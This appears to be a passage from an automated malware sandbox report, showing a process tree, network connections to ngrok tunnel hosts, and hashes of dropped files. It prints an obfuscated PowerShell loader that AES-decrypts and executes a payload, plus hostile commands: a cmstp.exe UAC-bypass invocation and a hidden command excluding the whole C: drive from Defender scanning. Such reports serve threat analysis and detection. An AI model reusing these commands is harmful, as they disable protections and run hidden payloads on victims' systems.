AEMAZABnAEsAKwB6AHMANwA4AGUAbgBlADQANQB1AFcAagBSAEMAawBGAFkAZABVAEsASgBqAEYAZQBqAEYAagBYAHcAegBhADgANgBkAGQAcABQAE4ATQBKAE8AVgByAGkAQwBmAEgAdwBGAFQARABxAFIAaQAwAFIAQQBiAFkAaABYAEoAYwBBADAATgBvAFoARwBlAEYARABoAGsATABxAFQAUAAzAFoAQgAwAGsAdABhAFYARgBIAGsAMQA0AHcAdgA1AEYARQBLAEgAOABwAHEASABUADkAYgA4AFQAMgBEAHYAeQBEAFMAMQBkAGwAVQBtAEsAZgBiAFcAUQBFAGcATABhADMANwA4ADQAMgA2AHkAVABEAFEAdABsAE0AZgBVAG0AKwAxAEEAbQBoAFoAQwBQAGQARABuACsAdgBPAEgAaABPAFMAWABCAFcAWAAzAHEAcgBzADIAOQBSAFAAQwAvAE8AagAvAFkARwB4AGcAOQAvAFMAZAA1ADcAMwBGAFIAMgBSAHQAagBBAHoAcwBqADQAMwBnAGMAbQBkAE4AOABWAGIARQAwAGQANAArAHEAeABRAGQAaQB3AEEAUABuAGEAdgBHADEAawBmAFUAawAwAGIAYgA3AEYAdgBhAGMAYwBJAFUAWQB0ADgAegBuADEATABuAE8AcABQAHkATABHAGEAaABQAFEARQBuAEMAbgAxAGIANQBxAHIAZwBnAEwAcwB4AEEAagBDAHcAaAArAEIAMAAxAEsATwBLACsARABhAGIAVwA0AFQAOABWAGYAYQBDAHYAUwBTAFYAUAA0AGgAeQBVAGgAOABGAE0ATAA5AFYATABRAGcAZABQAFYAOQBZACsAcwBmAEsAcwBDAGYANwAzAE4AUgAvADEAKwBhAE4ASgBuAFEARABIAE4AeQA0AHAAaQB2AGQAQQBZAEwAaQBnADkAdwBzADQAaQBFAFIAaQBMAFgALwBTAHoAawBjAFkAOABnAGIANgBmAFUAQwBwAG0AbQB4AEUASgBvAE4AeABUADEAcABWADUANABzADMAUgBzAG0AagBiADYAVgBSAEMAWQBkAEUAVAB3AEoAagBYADcAWgBPAHEAeQBBAHYAeABOAE0AagBxAFkAagBNAHUAegB4AGsAVAAvAG0AOAA1AFMAcwBsAG0AWgB4AHEAZABUAG4AegAxAFkATQBYADQAUQBuAHAARQBaAFgARgBqAFIANwBvAFAAVABYAC8AdQByAGEARwBDAG0AUQBaAFkASwB6ADYATwBJAGkAdABGADAAcABxAE8AVABiAE8AWgAzADcANwBJAFMATwBZAHgASgBVAHAAdABiAHkAdwBjAFQANAA2ADcAMQBLAEIAZwAyAEUARABYAHEASQB3AC8AawB1AEIAWgA1AEEAUgBWAHcAMABEAGEAcQBVAG4AcwBZAGoARQA4AFkAbgB2AGoAcABYAHoAcgBWAFgASABLAGQAeQArAE8ATQA1AHkAdgA4AEsASwBqAGEAawBPADcARwA5AGMAUQByAHYAUwBnADkARwBOAGIAWQBzAEsAWAAxAGQAcwBLAHoAQQBJAG8AMgBVAHIAegBlAHoAQwB4AGQAdwBCAGUAUgArAEEAbQBxAFAAKwBYAG0ARABZAHUANAAxAGUAbABqAGEAWABoAHQAaQA0AEYAVwBOAHIAdQBVAEYAMgBjACsAVQBrAFQAQwBYAHAAZgBNAHEASwBkAFoATQBQAEwAWgBiAHUATQBOAFIANQBhADcASABrAHkAZwBiAFgANQBLADgAKwBqADYAWABFAC8AOAAwADUAWAA0AEEANAAzAFgATgBCAFoAOABPADgASABnAHcATwBzACsAUwBOAEEAdwA2ADAAQgBOADIASQBnAEIAUQB1AHQAQQBKAGkARABVAGQARgAyADYAegBKAG8AYgB1AEIAVABsAGYAcQAxAEkAagBNAEoAUQBBAE8AZwByAGUAaABrAEMANQBzAHkARwBmAFAARABKADgALwBOAEYANgBCADMAeAAyAEgAYQBOAG4AVQBFAEwASABKAGgANwB4AGoATQBrAGcAYQBjAEIASgBTAHgAKwB5AEQAcwBvAFkAcAAzAFYAaABjAGwASgAwAEwANgByAFgAcgB4AGcAdABNAGEAegBuAG4AdgArAEEANgA0AFgATABzAHEAeQBvAC8ATwBhAFkARgBjACsAcABDAFEAVQAxAHAAUwBaAFcAbwBBAEEARQBZAGcAbQBvAHIAZQA3AGcAVQBmAGEAcwBCAGkAbAAxAFoASwBHAHcAZwBRAFYAQwBpAFEAaABXAEIATQB0AEkAbQBQAGQAMABvAFUASwBsAFYAawBlAE4AQQBiAG8AdQBZAEoAcQAwAFEAZQB1AG4ATgBjAGQAUAB1AEUANgBmAHYASABhAGEASgBEADAAbABHAFcAeQB3AHgAVgBCADQARAAxAEoARwA4ADAAVgB4AGsAKwBUAFIAYwBOADMAaAB6AE4ARABjADEAcAAvAGkAUQBkAFUASABvAHcAZwBHAGoAagB2AEoANQA4AGQAUgBnAFgAMABkAEMAWQBZAFAAcQBqAG0ANwBDAFYAdgA2AHEAaABsAGYAZwBjAHYAaQBNAEIAeABUAFoAMwB6ADgAbgAvAHEAVAAxAGcAcQA4AGMAZQBnAEYAZABiAC8AagAyAGIASQAzAFcAMABNAHgAYgA1ADQAbgBrAHQAdgByAEEAbwA5AHEASwBKACsAaQA0AEUAYgAxAG8AVAA0AGUANABvADAATgBKAG0AdgAzAFkAawB1AEUATgBtAFcAaQAwAFQAVQBKADMANQBwAEUAVwAxADgAUABMAG8AagBiAHoAMwBaAC8AYQBaAHQATABYAG0AQgBXAGcAegBUAHYAYQBkAHUAbAB3AHoAVQB1AHUATgB3AE0ATgBhAHAAeAA2AG4ATgB5AGIATwB4AE4AWQBYADQAaQA2AEgAUAA5AHkAYQBjAHEAcABWACsAaABXAGwAYwBsAFcAcgAvAGkAQgBaAHcAcAA3AG0ARwBRAEYAcQBaAGgAMwBnAFMAbgBiAC8AaABzAHUAUQBPAEMAOQB1AGQARgBLADEARQBLAEIARwBRAHQATgBZAHkAeQBSAEgARgBvAEcAMwBrADMARgBsADcARAByAFMAbAA2ADkAZwBPAGwAaABGAG0ASwBWAG8AZgBkAGUAKwBnAFEAMABLAHMATABSAFUALwBMAFIAOQBFAG0AVgBDAFQAMAB2AFEANQBzAG4AawBZAHQAeQBUAEEANgAvAFEAdwBPAFUAPQAiACkADQAKACAAIAAgACAAJABpACAAPQAgACQAZABbADAALgAuADEANQBdAA0ACgAgACAAIAAgACQAZQAgAD0AIAAkAGQAWwAxADYALgAuACgAJABkAC4ATABlAG4AZwB0AGgAIAAtACAAMQApAF0ADQAKACAAIAAgACAAJABhAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQADQAKACAAIAAgACAAJABhAGUAcwAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwANAAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJABhAA0ACgAgACAAIAAgACQAYQBlAHMALgBJAFYAIAA9ACAAJABpAA0ACgAgACAAIAAgACQAZABlAGMAIAA9ACAAJABhAGUAcwAuAEMAcgBlAGEAdABlAEQAZQBjAHIAeQBwAHQAbwByACgAKQANAAoAIAAgACAAIAAkAG8AdQB0ACAAPQAgACQAZABlAGMALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJABlACwAIAAwACwAIAAkAGUALgBMAGUAbgBnAHQAaAApAA0ACgAgACAAIAAgACQAcgBlAHMAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAKQANAAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHIAZQBzAA0ACgA= -inputFormat xml -outputFormat text

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16D.tmp" "c:\Users\Admin\AppData\Local\Temp\2o4uskvu\CSC49C4C84E83B744B2903DD7FD9243A6A.TMP"

C:\windows\system32\cmstp.exe

"C:\windows\system32\cmstp.exe" /au C:\windows\temp\xykv5532.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 empty.ngrok.io udp
DE 18.192.31.165:443 empty.ngrok.io tcp
US 8.8.8.8:53 165.31.192.18.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 3.127.253.86:13752 4.tcp.eu.ngrok.io tcp
DE 3.127.253.86:2024 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 18.198.77.177:13752 4.tcp.eu.ngrok.io tcp
DE 18.198.77.177:2024 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 udp
N/A 52.168.117.175:443 tcp
SE 192.229.221.95:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_saqhm3jx.qnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3740-11-0x0000020F1A600000-0x0000020F1A622000-memory.dmp

memory/3740-12-0x0000020F1B590000-0x0000020F1B5D4000-memory.dmp

memory/3740-13-0x0000020F1B660000-0x0000020F1B6D6000-memory.dmp

memory/2204-33-0x00000246D7110000-0x00000246D712C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.cmdline

MD5 58869a802a9c2e1c04b9eb5d7f432220
SHA1 171ff4a2c60e99776a4886facc6fe3e5c8752034
SHA256 c6b5d80261914ca01c48a67e466579a1d2e5119ceb98672c7e201759e4829eaf
SHA512 39ffa9a6cf2bafbb19a8729f5770197c1b291cba700bbe3e65a3c280d783c6af90ade0f48a1059a29073278f605136e4a23536d1e748e21e97607397572e1090

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.0.cs

MD5 f46493b6076a8ef8cc6c44a52727b2a4
SHA1 343c03142c931f1c57edd293deb1c8e53f4e87f0
SHA256 2ae921dbdf50779a8ab114a5cfe4b754d060e2b8ea251bed59215631edbd3baf
SHA512 263ba35062de9f60bd6482fcb337cc6358374309756bf43a6add5712fcfba15cc6cab698e1ae3b1edc6a1910f9ab34523dadbf9c804fb2034b892223d9aa444a

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\CSC49C4C84E83B744B2903DD7FD9243A6A.TMP

MD5 df5abc1b68f314a2534de138b51ff263
SHA1 4c20f0b482ffcd11c8634838a5c73dc88e5710cd
SHA256 ff6e39caa78f23bba3e59ce29f73ffe9aa5a53db4a23f2944cb856c9ed8c8854
SHA512 7a86930e65d2c89ca187768f740ad409453569d16e0e83f6d8c01e53a0152636b37b3beac6fa7159a77fa59937233c6e54d4cf3bb2d763023b5714dfd84057e6

C:\Users\Admin\AppData\Local\Temp\RES16D.tmp

MD5 b75652304ee61ed85280f80ba9d271c6
SHA1 ad0ce839024bc8389cfc5ba5e63636a91b192f7e
SHA256 f5603f8666aa7cfa3585ee157e3ab3a38d02c384b5c65de32aaf4736d8273de1
SHA512 3b2ef0bac64e7118a636293b67f35bf96840886e6e7f0e6bcd3d043a5b338d297dfdef8e755102156ec5d054a4c09c236dc3e00fba1d7f6ef802e60ddc446f0e

C:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.dll

MD5 f1fc8afd1e15c8479c8a20f2de132673
SHA1 fd075c453ae9eea3b0de8991f351f86e477385cd
SHA256 4b98c3a33a84afc36c3afba4bbc60447522875d78d25e4c6f12939f66684b102
SHA512 c0e219addb4380bccc016e329197f0d2694fa02a0bd27c0d40819f2076489a85f88ec04fe9bf35690a11198d6c295a16f6c94bc67636022e0fb28b411d037df9

memory/2204-46-0x00000246D7140000-0x00000246D7148000-memory.dmp

C:\windows\temp\xykv5532.inf

MD5 018502ac4a5c24da82f568213428dce1
SHA1 7c93907925720916d0cc34f7fb47f30ce4e0c96b
SHA256 e736f84e93c335e9067f14027d80b0d79e888b57bc16887de23bb88d315b064e
SHA512 acab30b8079223b15aa5c7144ade22eaaed5889163e25fc389a9500c7f7869d71fc550c10f0eed7532cd28e54de8ec07d20ed25af1619d095020c22ce9dbd0fa

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb777148f4462b58165887bd7cfaf279
SHA1 148d650f0cb95fbdebd928822392a217dd950835
SHA256 7151b9635f712ef042bcafda0d0f2a6c15e6611f396908ca83af5b67fd9f25fc
SHA512 2a2bb6a0da37b8dc7d72252313f1598937ab0482fff91f332c6e43ca5ca327b635a10511af8353f5f5dd37063c2940077c391afaefc7757518866d5ea6ef271b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d90c464f5e8245f143e045d0b06e62cc
SHA1 f1361149a171d2f09c8aeadb3dc104b7c0e43ea4
SHA256 b2011a58cf7dc6774632e2eab4803382a5dd75ba486bb94b240af6d8cb1445ed
SHA512 477ad88e3485876f294d08530fcdcf7d4ccdc2eb9e7e40c542e029df51bfca26d24c02efdd9ff145bf1a6e6e36e0490eed94091146ddfc51910196469a8b2ba9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5014db2c4ff933f758a9027e98f24a3a
SHA1 fec71b30a6189f55e8aecbe81843b8b2177c37c5
SHA256 011d2427f2f8bef3d68ad19ab9e1cc0f274b92be7379402fd8ae90c40e043716
SHA512 691ed29d1ea0aa7628b932b55bf2529bea2c6dc28017a2bd6eedd3f191933f6b43e4e0e8f6f177f7edf7c72d54285b3bb943207ec9cd07fdbd143c028a8277c2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 af59d42f6526cfabf0f502f8e83209f9
SHA1 6505f4560261dedfae55dc4a5b712802ffb2eed6
SHA256 f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f
SHA512 f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d65d5729810e777c618132ea705c1f14
SHA1 c0df1e6c8a70b39b8db337f84e7e9398bc9f6a9e
SHA256 51262a3776b88451b2843a41f185425c1626b1f749f8c10cc8ef243985bef27e
SHA512 8cab4719c12091d99f72c4307619fb7ab31854e81cc3c23304bf650698cb2d0cd00ca03f1e1b2065606dc4f5e28ad272bbc2acdc3383a6eba39d75777e9059f7

memory/3660-84-0x0000000000450000-0x0000000000462000-memory.dmp

memory/3920-85-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-87-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-86-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-97-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-96-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-95-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-94-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-93-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-92-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-91-0x0000016158800000-0x0000016158801000-memory.dmp